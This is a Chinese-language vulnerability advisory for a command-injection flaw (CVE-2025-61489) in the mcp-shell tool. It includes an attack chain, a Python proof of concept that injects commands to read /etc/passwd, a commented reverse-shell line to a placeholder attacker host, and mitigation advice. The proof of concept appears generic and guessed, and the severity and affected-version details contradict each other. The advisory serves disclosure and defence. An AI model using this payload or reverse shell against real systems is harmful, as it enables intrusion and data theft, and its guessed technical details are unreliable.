CVE-2025-61489: sonirico/mcp-shell shell

漏洞信息

漏洞编号

CVE-2025-61489

漏洞类型

命令注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

sonirico/mcp-shell v0.3.1

漏洞概述

CVE-2025-61489是sonirico/mcp-shell v0.3.1版本中的一个严重命令注入漏洞。该漏洞存在于shell_exec函数中，攻击者可以通过构造恶意的命令字符串在受影响的系统上执行任意命令。mcp-shell是一个用于在MCP（Model Context Protocol）环境中执行Shell命令的工具，攻击者无需任何认证即可利用此漏洞。由于该工具通常在服务器端运行，成功的命令注入攻击可能导致敏感数据泄露、系统完全沦陷以及内网横向移动等严重后果。CVSS 3.1评分为6.5，属于中危级别，攻击复杂度低，无需用户交互和特殊权限，这使得该漏洞极易被利用。建议受影响的用户立即升级到最新版本或采取临时缓解措施。

技术细节

该漏洞的根本原因在于mcp-shell的shell_exec函数对用户输入的命令字符串缺乏充分的过滤和验证。攻击者可以在命令字符串中注入恶意构造的Shell命令元字符（如分号、管道符、反引号等），从而绕过原有的命令执行逻辑。具体来说，当应用程序将用户可控的输入直接传递给系统shell执行时，攻击者可以通过在输入中插入额外的命令来实现任意命令执行。例如，攻击者可以在正常命令后追加分号和恶意命令，或利用管道符将命令输出传递给其他恶意程序。在mcp-shell的上下文中，由于该工具通常作为API服务运行，攻击者可以通过构造特定的API请求来触发shell_exec函数，从而执行任意系统命令。此类漏洞的典型利用方式包括：使用反引号执行子命令、利用$()进行命令替换、以及通过管道符链接多个命令。成功利用后，攻击者可以在服务器上执行任意代码，包括读取敏感文件、安装后门或建立持久化连接。

攻击链分析

STEP 1

步骤1

攻击者发现目标服务器运行存在漏洞的mcp-shell v0.3.1服务

STEP 2

步骤2

攻击者识别出shell_exec函数存在命令注入漏洞

STEP 3

步骤3

攻击者构造包含恶意Shell命令的payload，利用分号、管道符等元字符注入额外命令

STEP 4

步骤4

通过API请求将构造的payload发送给mcp-shell的shell_exec端点

STEP 5

步骤5

服务器将payload直接传递给系统shell执行，攻击者的恶意命令被成功执行

STEP 6

步骤6

攻击者获取服务器命令执行权限后可进行数据窃取、权限提升或内网横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-61489 PoC - mcp-shell command injection
# Target: sonirico/mcp-shell v0.3.1

def exploit_mcp_shell(target_url, malicious_cmd):
    """
    Exploit CVE-2025-61489: Command injection in shell_exec function
    
    Args:
        target_url: Base URL of the vulnerable mcp-shell service
        malicious_cmd: Malicious command to execute
    
    Returns:
        Response from the server
    """
    # Construct the payload with command injection
    # Using semicolon to chain commands
    payload = f"echo test; {malicious_cmd}"
    
    # Example: Send request to shell_exec endpoint
    endpoint = f"{target_url}/shell/exec"
    
    headers = {
        "Content-Type": "application/json"
    }
    
    data = {
        "command": payload,
        "timeout": 30
    }
    
    try:
        response = requests.post(endpoint, json=data, headers=headers, timeout=10)
        return response.json()
    except requests.exceptions.RequestException as e:
        return {"error": str(e)}

# Example usage
if __name__ == "__main__":
    target = "http://target:port"
    # Read /etc/passwd as proof of concept
    cmd = "cat /etc/passwd"
    result = exploit_mcp_shell(target, cmd)
    print(json.dumps(result, indent=2))
    
    # Reverse shell example (for authorized testing only)
    # reverse_shell_cmd = "bash -i >& /dev/tcp/attacker-ip/port 0>&1"
    # exploit_mcp_shell(target, reverse_shell_cmd)

影响范围

sonirico/mcp-shell < 0.3.1

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）限制对mcp-shell服务的网络访问，仅允许必要的受信任用户访问；2）实施严格的输入验证，过滤或转义所有Shell元字符；3）使用Web应用防火墙（WAF）规则阻止常见的命令注入模式；4）监控日志中的异常命令执行行为；5）考虑使用容器化技术隔离mcp-shell服务，限制潜在的损害范围。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61489
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61489
3 Details https://www.cvedetails.com/cve/CVE-2025-61489/
4 VulDB https://vuldb.com/cve/CVE-2025-61489
5 Link https://github.com/sonirico/mcp-shell
6 Link https://github.com/sonirico/mcp-shell/issues/4

CVE-2025-61489: sonirico/mcp-shell shell_exec命令注入漏洞